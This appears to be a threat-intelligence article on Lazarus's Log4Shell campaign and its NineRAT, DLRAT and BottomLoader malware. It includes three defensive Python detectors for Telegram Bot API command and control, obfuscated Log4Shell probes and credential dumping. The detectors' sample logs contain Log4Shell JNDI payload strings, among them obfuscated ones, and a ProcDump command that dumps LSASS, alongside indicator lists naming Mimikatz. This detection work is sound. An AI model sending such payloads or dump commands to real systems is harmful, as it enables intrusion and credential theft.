12 December 2023

North Korea’s Lazarus uses Log4j exploits to deliver novel DLang-based malware

The North Korean hacking group known as Lazarus has orchestrated a new campaign that exploits a two-year-old vulnerability (CVE-2021-44228, aka Log4Shell) to deploy three never-before-seen malware families written in the DLang programming language.

The new tools are two remote access trojans (RATs) and a downloader, all written in DLang. The first RAT, dubbed “NineRAT” by Cisco Talos researchers, uses Telegram bots and channels as its command and control (C2) channel; the second, tracked as “DLRAT,” does not rely on Telegram. The third family is a downloader named “BottomLoader.”

The new campaign, dubbed “Operation Blacksmith,” targets manufacturing, agricultural and physical security companies.

According to the threat intelligence team, NineRAT was initially built around May 2022 and was first used in this campaign as early as March 2023 against a South American agricultural organization. NineRAT was observed a second time in September 2023, targeting a European manufacturing entity.

“NineRAT … indicates a definitive shift in TTPs from APT groups falling under the Lazarus umbrella with the increased adoption of malware being authored using non-traditional frameworks such as the Qt framework, including MagicRAT and QuiteRAT,” the team said.

Talos said it found some overlap with the malicious activity reported by Microsoft in October 2023 and attributed to Onyx Sleet (aka Plutonium or Andariel). More recently, Andariel, which is believed to be a division within Lazarus, has been seen stealing key technologies from South Korean defense firms, including technology related to anti-aircraft weapons.

“NineRAT uses Telegram as its C2 channel for accepting commands, communicating their outputs and even for inbound and outbound file transfer. The use of Telegram by Lazarus is likely to evade network and host-based detection measures by employing a legitimate service as a channel of C2 communications,” Talos noted.

NineRAT is delivered by a dropper binary that writes two components to disk and then deletes itself. One of those components is an instrumentor called nsIookup.exe (a look-alike of the Windows nslookup.exe name, with an uppercase I in place of the lowercase l), which executes the components and takes part in the persistence mechanism.
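Two host- and network-side checks follow from the last two paragraphs: Telegram is a legitimate service, but the Bot API is only used by bots, so a Bot API URL (a bot token in the path) from an endpoint or server is a strong signal even when the destination itself is allow-listed; and a process name that only differs from a system binary by a confusable character (nsIookup.exe versus nslookup.exe) is cheap to flag. The following is an added example, not Talos's code or a NineRAT sample. The proxy log format, host names, process paths, the bot token and the allow-list are all constructed for the example.

```python
import re
from collections import defaultdict

# Telegram Bot API requests look like https://api.telegram.org/bot<id>:<token>/<method>.
# The token is a numeric bot id, a colon and a secret of roughly 35 characters.
BOT_API_PATH = re.compile(r"/bot\d{6,12}:[A-Za-z0-9_-]{30,40}/(\w+)")

# Bot API methods that map onto the C2 primitives the article describes for NineRAT:
# commands in (getUpdates), output out (sendMessage), files in/out (getFile/sendDocument).
C2_METHODS = {"getupdates", "sendmessage", "senddocument", "getfile"}

# Assumed allow-list for this example. The Telegram desktop client speaks MTProto to
# other endpoints and never calls the Bot API, so a Bot API path is flagged regardless.
ALLOWED_PROCESSES = {"telegram.exe"}

# A few system binaries worth protecting against look-alike names (assumed list).
KNOWN_SYSTEM_BINARIES = {"nslookup.exe", "svchost.exe", "rundll32.exe", "wscript.exe"}
# Characters that are commonly swapped to imitate a name: l/I/1 and o/0.
_CONFUSABLE = str.maketrans({"l": "?", "i": "?", "1": "?", "o": "?", "0": "?"})


def masquerade_of(proc_name):
    """Return the system binary a file name imitates via confusable characters, else None."""
    name = proc_name.lower()
    folded = name.translate(_CONFUSABLE)
    for real in KNOWN_SYSTEM_BINARIES:
        if name != real and folded == real.translate(_CONFUSABLE):
            return real
    return None


def parse_line(line):
    """Parse one constructed 'key=value' proxy log line into a dict."""
    return dict(kv.split("=", 1) for kv in line.split())


def classify(event):
    """Return the reasons this proxy event looks like Telegram-based C2 (empty if none)."""
    reasons = []
    if event.get("dst_host", "").lower() != "api.telegram.org":
        return reasons
    proc = event.get("proc", "").rsplit("\\", 1)[-1].lower()
    if proc not in ALLOWED_PROCESSES:
        reasons.append(f"unexpected process {proc} talking to api.telegram.org")
    real = masquerade_of(proc)
    if real:
        reasons.append(f"process name {proc} imitates {real}")
    m = BOT_API_PATH.search(event.get("path", ""))
    if m:
        reasons.append(f"Bot API call {m.group(1)} (bot token in URL, not a user client)")
        if m.group(1).lower() in C2_METHODS:
            reasons.append("method matches a command, output or file-transfer primitive")
    return reasons


def scan(lines):
    """Return {host: [reasons...]} for every host with suspicious Telegram traffic."""
    hits = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        for reason in classify(ev):
            hits[ev["host"]].append(reason)
    return dict(hits)


def suspicious_hosts(lines):
    return sorted(scan(lines))


# Constructed proxy log lines (not real telemetry). Raw strings keep the backslashes intact.
SAMPLE_LOG = [
    r"ts=2023-09-14T10:01:02 host=WS-017 proc=C:\Apps\Telegram\Telegram.exe dst_host=api.telegram.org path=/",
    r"ts=2023-09-14T10:03:17 host=SRV-HZ01 proc=C:\Windows\System32\nsIookup.exe dst_host=api.telegram.org path=/bot1234567890:AAEexampleTokenForTestingOnly000001/getUpdates",
    r"ts=2023-09-14T10:03:52 host=SRV-HZ01 proc=C:\Windows\System32\nsIookup.exe dst_host=api.telegram.org path=/bot1234567890:AAEexampleTokenForTestingOnly000001/sendDocument",
    r"ts=2023-09-14T10:05:00 host=WS-022 proc=C:\Program\chrome.exe dst_host=web.telegram.org path=/",
]

if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_LOG).items():
        print(host)
        for r in reasons:
            print("  -", r)
```

Only SRV-HZ01 is reported: the Telegram client on WS-017 is allow-listed and makes no Bot API call, and WS-022 never touches api.telegram.org. In production the same logic belongs in the proxy or DNS pipeline, with the process attribution coming from EDR telemetry rather than from the proxy log.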

The BottomLoader downloader is designed to download and execute the next-stage payload (HazyLoad) from a remote host, while DLRAT is used for system reconnaissance.

“This particular attack observed by Talos involves the successful exploitation of CVE-2021-44228, also known as Log4Shell, on publicly facing VMWare Horizon servers, as a means of initial access to vulnerable public-facing servers. Preliminary reconnaissance follows the initial access leading to the deployment of a custom-made implant on the infected system,” the team said.
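Log4Shell probes against a public-facing server such as Horizon arrive as `${jndi:...}` lookups in request paths, query strings or headers, and real attackers obfuscate them with nested lookups (`${lower:j}`, `${upper:n}`, `${::-j}`, `${env:X:-j}`) and URL encoding so a naive `jndi:ldap` grep misses them. The detector below normalizes a log line the way Log4j's lookup engine would (innermost lookup first) before matching. It is an added example written for this page, not a Talos detection or part of the campaign's tooling; the access log lines are constructed, and the list of resolvable JNDI protocols is an assumption.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: no nested braces inside.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# jndi: followed by a protocol the JNDI lookup will actually resolve (assumed list).
_JNDI = re.compile(r"jndi:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)", re.I)


def _resolve(m):
    """Evaluate one innermost Log4j lookup used purely as an obfuscation transform."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()          # ${lower:J} -> j
    if low.startswith("upper:"):
        return body[6:].upper()          # ${upper:n} -> N
    if ":-" in body:
        return body.split(":-", 1)[1]    # ${env:NOPE:-j} and ${::-j} -> j (default value)
    return m.group(0)                    # anything else (the jndi lookup itself) stays


def normalize(s, rounds=20):
    """Undo URL encoding and nested-lookup obfuscation, innermost lookups first."""
    s = unquote(unquote(s))              # double-decode: %2524 -> %24 -> $
    for _ in range(rounds):
        new = _INNER.sub(_resolve, s)
        if new == s:                     # nothing left to resolve
            break
        s = new
    return s


def is_log4shell_probe(s):
    return _JNDI.search(normalize(s)) is not None


def scan(lines):
    """Return (index, normalized line) for every line carrying a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed web access log lines (not from the incident). Index 0 and 4 are benign.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [12/Dec/2023:09:14:11 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.7 - - [12/Dec/2023:09:14:13 +0000] "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/o}"',
    '198.51.100.4 - - [12/Dec/2023:09:20:02 +0000] "GET /portal/ HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.9/x}"',
    '198.51.100.4 - - [12/Dec/2023:09:20:05 +0000] "GET /portal/?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.9%3A1099%2Fa%7D HTTP/1.1" 404 "curl/8.0"',
    '192.0.2.11 - - [12/Dec/2023:09:31:40 +0000] "GET /portal/ HTTP/1.1" 200 "${date:yyyy-MM-dd}"',
]

if __name__ == "__main__":
    for i, line in scan(SAMPLE_ACCESS_LOG):
        print(f"line {i}: {line}")
```

Lines 1, 2 and 3 are flagged; line 4 contains a harmless `${date:...}` lookup and is not, which matters because alerting on any `${` produces noise on servers that legitimately log such strings. The normalizer stops when a round changes nothing, so a line with an unresolvable lookup cannot loop.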

After the initial reconnaissance, Lazarus deployed HazyLoad, a proxy tool used to establish direct access to the infected system without having to repeatedly exploit CVE-2021-44228. The attackers then created an additional local administrator account and used it to download and run credential-dumping utilities such as ProcDump and Mimikatz. Talos noted that this differs from previous Lazarus campaigns, in which the threat actor created unauthorized user accounts at the domain level.
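The post-exploitation sequence above (a new local account, its addition to the local Administrators group, then that account running a credential dumper) is a textbook correlation for Windows Security event IDs 4720, 4732 and 4688. The example below, added for this page and not derived from Talos's report or any vendor rule, correlates those events on the same host within a time window and keys on SIDs rather than names so renamed accounts do not slip through. The events, host names, SIDs and the renamed ProcDump binary are constructed; the process-name and command-line indicator lists are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

LOCAL_ADMINS_SID = "S-1-5-32-544"          # well-known SID of the built-in Administrators group
DUMP_TOOLS = {"procdump.exe", "procdump64.exe", "mimikatz.exe"}          # assumed indicator list
DUMP_CMDLINE_TOKENS = ("sekurlsa", "lsadump", "-ma lsass", "lsass.exe")  # catches renamed binaries


def _ts(e):
    return datetime.fromisoformat(e["time"])


def correlate(events, window=timedelta(hours=6)):
    """Alert on: 4720 account created -> 4732 added to Administrators -> 4688 credential dumper run.

    All three must occur on the same host within `window` of the account creation,
    and the 4732 member SID must equal the 4720 target SID.
    """
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)

    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=_ts)
        for c in (e for e in evs if e["id"] == 4720):
            sid, user, t0 = c["TargetSid"], c["TargetUserName"], _ts(c)
            in_window = lambda e: t0 <= _ts(e) <= t0 + window
            elevated = any(
                e["id"] == 4732 and e["TargetSid"] == LOCAL_ADMINS_SID
                and e["MemberSid"] == sid and in_window(e)
                for e in evs
            )
            if not elevated:
                continue
            for p in evs:
                if p["id"] != 4688 or p["SubjectUserName"].lower() != user.lower() or not in_window(p):
                    continue
                image = p["NewProcessName"].rsplit("\\", 1)[-1].lower()
                cmd = p.get("CommandLine", "").lower()
                if image in DUMP_TOOLS or any(tok in cmd for tok in DUMP_CMDLINE_TOKENS):
                    alerts.append({
                        "host": host,
                        "account": user,
                        "created_by": c["SubjectUserName"],
                        "tool": p["NewProcessName"],
                        "minutes_after_creation": int((_ts(p) - t0).total_seconds() // 60),
                    })
    return alerts


# Constructed Windows Security events (not real logs). The dumper has been renamed to pd.exe,
# so only the command line gives it away.
SAMPLE_EVENTS = [
    {"time": "2023-09-14T10:00:00", "host": "SRV-HZ01", "id": 4720, "SubjectUserName": "SYSTEM",
     "TargetUserName": "svc_backup2", "TargetSid": "S-1-5-21-1111-2222-3333-1010"},
    {"time": "2023-09-14T10:00:05", "host": "SRV-HZ01", "id": 4732, "SubjectUserName": "SYSTEM",
     "TargetSid": "S-1-5-32-544", "MemberSid": "S-1-5-21-1111-2222-3333-1010"},
    {"time": "2023-09-14T10:22:41", "host": "SRV-HZ01", "id": 4688, "SubjectUserName": "svc_backup2",
     "NewProcessName": r"C:\Windows\Temp\pd.exe",
     "CommandLine": r"pd.exe -accepteula -ma lsass.exe C:\Windows\Temp\out.dmp"},
    # Benign: helpdesk creates a standard user on a workstation; never elevated, runs notepad.
    {"time": "2023-09-14T11:00:00", "host": "WS-017", "id": 4720, "SubjectUserName": "helpdesk1",
     "TargetUserName": "bob", "TargetSid": "S-1-5-21-4444-5555-6666-1020"},
    {"time": "2023-09-14T11:05:00", "host": "WS-017", "id": 4688, "SubjectUserName": "bob",
     "NewProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a)
```

Only SRV-HZ01 produces an alert. Two caveats for production use: 4688 carries a command line only when "Include command line in process creation events" is enabled by policy, and a dumper that avoids a telltale command line is better caught by LSASS handle access telemetry (Sysmon event 10 or an EDR equivalent) than by any name list.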
